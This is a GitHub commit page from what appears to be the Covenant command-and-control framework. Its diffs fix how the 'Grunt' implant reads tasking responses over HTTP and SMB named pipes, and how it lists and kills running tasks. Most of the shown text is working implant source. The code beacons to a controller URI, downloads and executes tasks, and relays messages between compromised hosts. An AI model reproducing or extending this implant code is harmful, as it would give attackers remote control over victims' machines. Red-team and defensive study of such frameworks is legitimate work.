Skip to content

Commit

Permalink
Fix profile bug when HttpGetResponse differs from HttpPostResponse, F…
Browse files Browse the repository at this point in the history 
…ix TaskKill display bug
  • Loading branch information
@cobbr
cobbr committed Aug 21, 2020
1 parent ad30520 commit 3a9d765
Show file tree
Hide file tree
Showing 5 changed files with 181 additions and 72 deletions.
2 changes: 2 additions & 0 deletions CHANGELOG.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0

### Fixed
- Fix edit roles for CovenantUser UI bug
- Fix profile bug when HttpGetResponse differs from HttpPostResponse
- Fix TaskKill display bug

## [v0.6] - 2020-08-04
### Added
Expand Down
63 changes: 45 additions & 18 deletions Covenant/Data/Grunt/Brute/Brute.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -138,26 +138,31 @@ public static void Execute(string CovenantURI, string CovenantCertHash, string G
}
else if(message.Type == GruntTaskingType.Tasks)
{
if (!Tasks.Where(J => J.Value.IsAlive).Any()) { output += "No active tasks!"; }
if (!Tasks.Where(T => T.Value.ThreadState == ThreadState.Running).Any()) { output += "No active tasks!"; }
else
{
output += "Task Status" + Environment.NewLine;
output += "---- ------" + Environment.NewLine;
output += String.Join(Environment.NewLine, Tasks.Where(T => T.Value.IsAlive).Select(T => T.Key + " Active").ToArray());
output += String.Join(Environment.NewLine, Tasks.Where(T => T.Value.ThreadState == ThreadState.Running).Select(T => T.Key + " Active").ToArray());
}
messenger.QueueTaskingMessage(new GruntTaskingMessageResponse(GruntTaskingStatus.Completed, output).ToJson(), message.Name);
}
else if(message.Type == GruntTaskingType.TaskKill)
{
var matched = Tasks.Where(T => T.Value.IsAlive && T.Key.ToLower() == message.Message.ToLower());
var matched = Tasks.Where(T => T.Value.ThreadState == ThreadState.Running && T.Key.ToLower() == message.Message.ToLower());
if (!matched.Any())
{
output += "No task with name: " + message.Message;
output += "No active task with name: " + message.Message;
}
else
{
KeyValuePair<string, Thread> t = matched.First();
t.Value.Abort();
Thread.Sleep(3000);
if (t.Value.IsAlive)
{
t.Value.Suspend();
}
output += "Task: " + t.Key + " killed!";
}
messenger.QueueTaskingMessage(new GruntTaskingMessageResponse(GruntTaskingStatus.Completed, output).ToJson(), message.Name);
Expand Down Expand Up @@ -308,12 +313,24 @@ private static void TaskExecute(TaskingMessenger messenger, GruntTaskingMessage
}
}

public enum MessageType
{
Read,
Write
}

public class ProfileMessage
{
public MessageType Type { get; set; }
public string Message { get; set; }
}

public interface IMessenger
{
string Hostname { get; }
string Identifier { get; set; }
string Authenticator { get; set; }
string Read();
ProfileMessage Read();
void Write(string Message);
void Close();
}
Expand Down Expand Up @@ -379,16 +396,24 @@ public TaskingMessenger(MessageCrafter Crafter, IMessenger Messenger, Profile Pr

public GruntTaskingMessage ReadTaskingMessage()
{
string read = "";
ProfileMessage readMessage = null;
lock (_UpstreamLock)
{
read = this.UpstreamMessenger.Read();
readMessage = this.UpstreamMessenger.Read();
}
if (read == null)
if (readMessage == null)
{
return null;
}
GruntEncryptedMessage gruntMessage = this.Profile.ParsePostResponse(read);
GruntEncryptedMessage gruntMessage = null;
if (readMessage.Type == MessageType.Read)
{
gruntMessage = this.Profile.ParseGetResponse(readMessage.Message);
}
else if (readMessage.Type == MessageType.Write)
{
gruntMessage = this.Profile.ParsePostResponse(readMessage.Message);
}
if (gruntMessage == null)
{
return null;
Expand All @@ -406,7 +431,7 @@ public GruntTaskingMessage ReadTaskingMessage()
if (relay != null)
{
// TODO: why does this need to be PostResponse?
relay.Write(this.Profile.FormatPostResponse(wrappedMessage));
relay.Write(this.Profile.FormatGetResponse(wrappedMessage));
}
return null;
}
Expand Down Expand Up @@ -481,7 +506,7 @@ public class HttpMessenger : IMessenger
private bool UseCertPinning { get; set; }
private bool ValidateCert { get; set; }

private string ToReadValue { get; set; } = "";
private Queue<ProfileMessage> ToReadQueue { get; } = new Queue<ProfileMessage>();

public HttpMessenger(string CovenantURI, string CovenantCertHash, bool UseCertPinning, bool ValidateCert, List<string> ProfileHttpHeaderNames, List<string> ProfileHttpHeaderValues, List<string> ProfileHttpUrls)
{
Expand Down Expand Up @@ -514,18 +539,16 @@ public HttpMessenger(string CovenantURI, string CovenantCertHash, bool UseCertPi
};
}

public string Read()
public ProfileMessage Read()
{
if (ToReadValue != "")
if (this.ToReadQueue.Any())
{
string temp = ToReadValue;
ToReadValue = "";
return temp;
return this.ToReadQueue.Dequeue();
}
lock (this._WebClientLock)
{
this.SetupCookieWebClient();
return this.CovenantClient.DownloadString(this.CovenantURI + this.GetURL());
return new ProfileMessage { Type = MessageType.Read, Message = this.CovenantClient.DownloadString(this.CovenantURI + this.GetURL()) };
}
}

Expand All @@ -534,7 +557,11 @@ public void Write(string Message)
lock (this._WebClientLock)
{
this.SetupCookieWebClient();
this.ToReadValue = this.CovenantClient.UploadString(this.CovenantURI + this.GetURL(), Message);
ProfileMessage ToReadMessage = new ProfileMessage { Type = MessageType.Write, Message = this.CovenantClient.UploadString(this.CovenantURI + this.GetURL(), Message) };
if (ToReadMessage.Message != "")
{
this.ToReadQueue.Enqueue(ToReadMessage);
}
}
}

Expand Down
61 changes: 48 additions & 13 deletions Covenant/Data/Grunt/GruntBridge/GruntBridge.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -142,26 +142,31 @@ public static void Execute(string CovenantURI, string GUID, Aes SessionKey, TcpC
}
else if(message.Type == GruntTaskingType.Tasks)
{
if (!Tasks.Where(J => J.Value.IsAlive).Any()) { output += "No active tasks!"; }
if (!Tasks.Where(T => T.Value.ThreadState == ThreadState.Running).Any()) { output += "No active tasks!"; }
else
{
output += "Task Status" + Environment.NewLine;
output += "---- ------" + Environment.NewLine;
output += String.Join(Environment.NewLine, Tasks.Where(T => T.Value.IsAlive).Select(T => T.Key + " Active").ToArray());
output += String.Join(Environment.NewLine, Tasks.Where(T => T.Value.ThreadState == ThreadState.Running).Select(T => T.Key + " Active").ToArray());
}
messenger.QueueTaskingMessage(new GruntTaskingMessageResponse(GruntTaskingStatus.Completed, output).ToJson(), message.Name);
}
else if(message.Type == GruntTaskingType.TaskKill)
{
var matched = Tasks.Where(T => T.Value.IsAlive && T.Key.ToLower() == message.Message.ToLower());
var matched = Tasks.Where(T => T.Value.ThreadState == ThreadState.Running && T.Key.ToLower() == message.Message.ToLower());
if (!matched.Any())
{
output += "No task with name: " + message.Message;
output += "No active task with name: " + message.Message;
}
else
{
KeyValuePair<string, Thread> t = matched.First();
t.Value.Abort();
Thread.Sleep(3000);
if (t.Value.IsAlive)
{
t.Value.Suspend();
}
output += "Task: " + t.Key + " killed!";
}
messenger.QueueTaskingMessage(new GruntTaskingMessageResponse(GruntTaskingStatus.Completed, output).ToJson(), message.Name);
Expand Down Expand Up @@ -334,6 +339,28 @@ private static IntPtr TaskExecute(TaskingMessenger messenger, GruntTaskingMessag
}
}

public enum MessageType
{
Read,
Write
}

public class ProfileMessage
{
public MessageType Type { get; set; }
public string Message { get; set; }
}

public interface IMessenger
{
string Hostname { get; }
string Identifier { get; set; }
string Authenticator { get; set; }
ProfileMessage Read();
void Write(string Message);
void Close();
}

public class Profile
{
private string ReadFormat { get; }
Expand Down Expand Up @@ -393,16 +420,24 @@ public TaskingMessenger(MessageCrafter Crafter, IMessenger Messenger, Profile Pr

public GruntTaskingMessage ReadTaskingMessage()
{
string read = "";
ProfileMessage readMessage = null;
lock (_UpstreamLock)
{
read = this.UpstreamMessenger.Read();
readMessage = this.UpstreamMessenger.Read();
}
if (read == null)
if (readMessage == null)
{
return null;
}
GruntEncryptedMessage gruntMessage = this.Profile.ParseReadFormat(read);
GruntEncryptedMessage gruntMessage = null;
if (readMessage.Type == MessageType.Read)
{
gruntMessage = this.Profile.ParseReadFormat(readMessage.Message);
}
else if (readMessage.Type == MessageType.Write)
{
gruntMessage = this.Profile.ParseWriteFormat(readMessage.Message);
}
if (gruntMessage == null)
{
return null;
Expand Down Expand Up @@ -474,10 +509,10 @@ public bool Connect(string Hostname, string PipeName)
{
try
{
string read = downstream.Read();
ProfileMessage read = downstream.Read();
if (downstream.Identifier == "")
{
GruntEncryptedMessage message = this.Profile.ParseWriteFormat(read);
GruntEncryptedMessage message = this.Profile.ParseWriteFormat(read.Message);
if (message.GUID.Length == 20)
{
downstream.Identifier = message.GUID.Substring(10);
Expand All @@ -487,7 +522,7 @@ public bool Connect(string Hostname, string PipeName)
downstream.Identifier = message.GUID;
}
}
this.UpstreamMessenger.Write(read);
this.UpstreamMessenger.Write(read.Message);
}
catch (ThreadAbortException)
{
Expand Down Expand Up @@ -570,9 +605,9 @@ public SMBMessenger(string Hostname, string PipeName = "gruntsvc", int Timeout =
this.Pipe = ClientPipe;
}

public string Read()
public ProfileMessage Read()
{
return Common.GruntEncoding.GetString(this.ReadBytes());
return new ProfileMessage { Type = MessageType.Read, Message = Common.GruntEncoding.GetString(this.ReadBytes()) };
}

public void Write(string Message)
Expand Down
Loading

0 comments on commit 3a9d765

Please sign in to comment.